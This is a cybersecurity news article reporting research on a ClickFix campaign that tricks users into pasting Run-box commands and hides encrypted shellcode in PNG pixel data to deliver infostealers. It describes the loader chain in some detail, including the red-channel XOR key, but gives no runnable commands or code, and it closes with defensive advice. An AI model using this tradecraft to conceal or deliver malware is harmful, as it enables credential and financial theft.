Threat actors have evolved their attack strategies by combining the deceptive ClickFix social engineering lure with advanced steganography techniques to conceal malicious payloads within PNG image files.
This sophisticated approach, discovered by Huntress analysts, represents a significant shift in how cybercriminals deliver information-stealing malware to unsuspecting users.
ClickFix operates as a multi-stage attack chain that tricks users into manually executing commands via the Windows Run prompt.
.webp "Hackers Using ClickFix Technique to Hide Images within the Image Files 2")
The campaign begins when victims encounter convincing lures, including fake robot verification screens and realistic Windows Update notifications.
These pages instruct users to press Win+R to open the Run box, then paste a command that has been automatically copied to their clipboard.
Once executed, this initial command initiates a dangerous chain of events that ultimately delivers malware to the target system.
.webp "Hackers Using ClickFix Technique to Hide Images within the Image Files 4")
Huntress analysts and researchers identified the malware emerging in October 2025, with campaigns evolving across two distinct variants.
The initial “Human Verification” lures have been overshadowed by newer, more convincing fake Windows Update screens that mimic legitimate Microsoft updates in full-screen mode, complete with realistic “Working on updates” animations before prompting the ClickFix command execution.
Steganographic Payload Concealment
The most notable aspect of this campaign is how threat actors conceal their final malware stages. Rather than appending malicious data to images, the attackers use a custom steganographic algorithm to encode shellcode directly within the pixel data of PNG images.
This technique relies on specific color channels—particularly the red channel—to reconstruct and decrypt the payload entirely in memory.
.webp "Hackers Using ClickFix Technique to Hide Images within the Image Files 5")
The infection mechanism begins with an mshta.exe command containing a hex-encoded IP address in its second octet.
This triggers a PowerShell loader that dynamically decrypts and reflectively loads a .NET assembly. This assembly acts as a steganographic loader, extracting shellcode hidden within an encrypted PNG image embedded as a manifest resource.
The extraction process uses the bitmap’s raw pixel data, calculating offsets for each row and column, then XORs the red channel value with 114 to recover the encrypted shellcode bytes.
The extracted shellcode is packed using Donut, a shellcode packer that enables in-memory .NET assembly execution.
.webp "Hackers Using ClickFix Technique to Hide Images within the Image Files 6")
Huntress researchers documented that the final payloads delivered through this mechanism include information-stealing malware such as LummaC2 and Rhadamanthys, designed to harvest sensitive user credentials and financial information.
This campaign demonstrates how threat actors continue to innovate their detection evasion capabilities. By hiding payloads within image pixel data rather than traditional file structures, attackers complicate analysis and evade signature-based detection systems.
However, the attack still relies on the fundamental weakness of social engineering—convincing users to manually execute commands.
Organizations should prioritize user awareness training and consider disabling the Windows Run box through registry modifications or Group Policy to prevent this attack vector from succeeding.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
